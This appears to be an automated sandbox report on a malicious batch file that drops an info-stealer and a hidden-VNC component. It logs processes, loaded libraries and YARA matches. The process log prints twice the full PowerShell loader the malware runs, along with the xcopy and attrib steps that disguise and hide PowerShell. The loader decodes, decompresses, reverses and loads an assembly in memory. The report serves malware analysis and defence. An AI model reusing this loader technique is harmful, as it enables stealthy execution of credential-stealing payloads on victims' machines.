Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA0040	8_2_05DA0040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA3A90	8_2_05DA3A90
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA1648	8_2_05DA1648
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA0367	8_2_05DA0367
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0709CF23	8_2_0709CF23
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_07093E79	8_2_07093E79
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0709CB70	8_2_0709CB70
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_070939B8	8_2_070939B8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0709D39D	8_2_0709D39D
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_07092100	8_2_07092100
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_070939A8	8_2_070939A8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_070920F0	8_2_070920F0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_074FCD88	8_2_074FCD88
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_074E0040	8_2_074E0040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_074E001E	8_2_074E001E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_02CB2008	9_2_02CB2008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_02CB2018	9_2_02CB2018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_02CB2645	9_2_02CB2645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D1C18	13_2_025D1C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D1C28	13_2_025D1C28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D55D0	13_2_025D55D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D55C2	13_2_025D55C2

One or more processes crash

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 2268

Sample file is different than original file name gathered from version info

Source: 849128312.cmd.Fjz, 00000007.00000000.2063299773.0000000000A74000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFile-CR-0110-CMD2.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVvzcd.dll" vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2216633711.00000000086E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVvzcd.dll" vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2223259743.0000000008FD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamestealer-CR-0110.exe@ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVvzcd.dll" vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005376000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehvnc-CR-SCR3-0110.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005382000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehvnc-CR-SCR3-0110.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.00000000052EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamestealer-CR-0110.exe@ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004BD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamestealer-CR-0110.exe@ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004B71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2216051258.0000000008350000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFile-CR-0110-CMD2.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2171542081.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 849128312.cmd
Source: 849128312.cmd.Fjz.4.dr	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 849128312.cmd

Yara signature match

Source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.evad.winCMD@20/4@3/3

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\Desktop\849128312.cmd.Fjz

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1628:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:64:WilError_03

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1xryabt.rdz.ps1

Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\chcp.com

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

File read: C:\Users\user\Desktop\849128312.cmd

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\849128312.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' \| Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() \| Out-Null"
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe "C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe"
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 2268
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1144
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' \| Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() \| Out-Null"	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe "C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe"	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
